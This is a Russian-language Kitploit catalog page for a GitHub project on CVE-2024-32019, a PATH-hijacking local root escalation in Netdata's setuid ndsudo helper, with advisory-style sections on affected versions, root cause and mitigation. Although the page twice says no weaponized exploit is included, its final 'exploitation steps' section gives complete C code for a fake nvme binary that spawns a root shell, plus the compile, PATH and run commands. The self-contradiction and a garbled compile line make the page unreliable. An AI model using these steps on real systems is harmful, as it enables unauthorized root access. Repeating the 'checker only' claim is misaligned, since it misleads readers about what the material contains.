Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2024-32019-PoC — Невооруженный PoC и чекер для CVE-2024-32019 — локального повышения привилегий в помощнике ndsudo от Netdata. Оцените подверженность, проверьте обновления и поймите вектор эксплуатации, основанный на PATH. | Kitploit
Инструменты/GitHubGitHub/sphyos/cve-2024-32019-poc
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubsphyos/cve-2024-32019-poc

cve-2024-32019-PoC

Невооруженный PoC и чекер для CVE-2024-32019 — локального повышения привилегий в помощнике ndsudo от Netdata. Оцените подверженность, проверьте обновления и поймите вектор эксплуатации, основанный на PATH.

Репозиторий
21 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-32019 — Повышение локальных привилегий через ndsudo в Netdata

Краткое описание

Вспомогательная программа ndsudo Netdata (устанавливается с флагом setuid root) ограничивает список выполняемых команд, но разрешает эти команды, используя PATH вызывающего пользователя. В уязвимых версиях локальный пользователь может поместить вредоносный бинарный файл раньше в PATH, и ndsudo выполнит его с привилегиями root. Исправлено в Netdata 1.45.3 и 1.45.0-169.

Затронутые / Исправленные

  • Затронуты: >= 1.44.0-60, < 1.45.0-169 и >= 1.45.0, < 1.45.3 (согласно рекомендации разработчика).

  • Исправлено: 1.45.3 (стабильная), 1.45.0-169 (ночная сборка). GitHub

Воздействие

Локальное повышение привилегий до root в системах, где ndsudo установлен с SUID, и пользователь может его вызывать (обычно члены группы netdata). NVDGitHub

Первопричина (общий уровень)

  • ndsudo установлен с SUID-root и проверяет по белому списку подкоманды, такие как nvme-list, nvme-smart-log и т.д.

  • Он вызывает внешние исполняемые файлы по имени (например, nvme), которые разрешаются через PATH вместо использования абсолютных путей или безопасного фиксированного поиска.

  • Если доступный для записи каталог появляется раньше системных путей, злоумышленник может внедрить поддельный бинарник, который будет выполнен от имени root. GitHub

Безопасное воспроизведение / Проверка

Этот репозиторий включает проверяющие скрипты (не эксплойты), которые:

  • Проверяют /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo (или в любом другом месте установки) на SUID/права владельца.

  • Перечисляют каталоги в PATH, доступные для записи, которые находятся раньше стандартных системных путей.

  • Подтверждают наличие имен подкоманд из белого списка, которые ndsudo может попытаться выполнить.

  • Опционально запускают ndsudo --test <subcommand> для вывода разрешенной команды без её выполнения (используйте с осторожностью, сначала прочтите код). GitHub

⚠️ Вредоносный PoC не включен. Этот проект предназначен для защитников и исследователей, чтобы оценить степень уязвимости и ответственно проверить исправления.

Смягчение

  • Обновите Netdata до версии 1.45.3 (стабильная) или 1.45.0-169 (ночная сборка).

  • В качестве меры многоуровневой защиты используйте абсолютные пути или санированный минимальный PATH во вспомогательных программах с SUID; избегайте предоставления ненужного доступа к ndsudo. GitHubwiz.io

Шаги эксплуатации

1. Сохраните следующий код на C как nvme.c:
root@kitploit:~
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}
2. Скомпилируйте эксплойт
root@kitploit:~
gcc nvme.c - nvme
3. Настройка окружения
root@kitploit:~
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme
4. Измените переменную PATH
root@kitploit:~
export PATH=/tmp/fakebin:$PATH
5. Команда эксплуатации
root@kitploit:~
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

Ссылки

  • NVD: CVE-2024-32019. NVD

  • Рекомендация Netdata (GHSA-pmhq-4cxq-wj93). GitHub

  • Сводка от Wiz. wiz.io

  • Статья от Snyk. Vulnerability Guide

  • Запись MITRE/CVE. CVE

Скачать инструмент